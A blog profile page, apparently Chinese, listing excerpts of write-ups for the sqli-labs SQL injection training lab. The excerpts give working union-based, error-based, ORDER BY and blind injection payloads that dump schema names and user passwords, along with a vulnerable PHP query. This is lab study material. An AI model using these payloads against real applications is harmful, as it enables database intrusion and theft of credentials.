- 博客(7)
- 收藏
- 关注
原创 Less 54-65
Less-54?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'challenges' --+?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='p6n1r9z4ea' --+?id=-1' unio
2020-08-19 18:03:35
109
原创 order by 注入 Less 46-53
order by注入,考虑几个方面:1、后面跟一个数字(构造 order by 后的一个语句,让该语句执行结果为一个数)。直接添加注入语句,?sort=(select ******)2、?sort=rand(sql 语句)?sort=rand(true)?sort=rand(false)3、利用 and,例如?sort=1 and (加 sql 语句)Less-46# 报错注入?sort=(select count(*) from information_schema.columns g
2020-08-18 14:24:47
145
原创 Less17-45
增:insert into 表名 values(记录1),values(记录2),... ;删:delete from 表名 where 条件; #删除记录,没有where时表示清空某表#删除结构drop database/table 数据库名/表名; #删除数据库或表alter table 表名 drop column 列名; #删除某表中的一列改:update 表名 set 列名='新值' where 条件; #无where时表示该表所有记录中被选中的这一列都修改为新值查:
2020-08-17 10:59:20
90
原创 Less 11-16
见到输入框了后台处理数据依旧是 SQL语句的拼接Less-11-1' union select 1,group_concat(id,'.',username,':',password) from users #Less-12-1") union select 1,group_concat(id,'.',username,':',password) from users #Less-13-1') union select 1,group_concat(id,'.',username,':',
2020-08-10 09:27:55
76
原创 Less 5-6
SQL注入中,我们会尝试使用一些手段让SQL语句拼接之后执行错误,这时候如果有回显(错误信息被显示在界面上),例如Less 1-4,我们可以清楚的知道哪里出了问题,进而猜出原SQL语句。但是如果没有回显(也就是盲注),布尔盲注(构造逻辑判断)截取字符串常用函数:# 截取字符串一部分mid(column_name, start[, length]) # column_name可以为sql语句,start默认从1开始,length可选参数,截取指定长度 eg: str="123456"
2020-08-06 17:08:01
111
原创 Less 1-4
开头先随便试?id=1,然后追加'或者" 看报错信息,基本就知道源码SQL语句是什么了Less-1源码$id = $_GET['id'];$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";在拼接SQL语句时未对id进行任何的过滤等操作payload:1、?id=1' or 1=1 --+# 拼接结果:SELECT * FROM users WHERE id='1' or 1=1 --+' LIMIT 0,11=1永真,--+后面都
2020-08-04 17:18:07
126
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人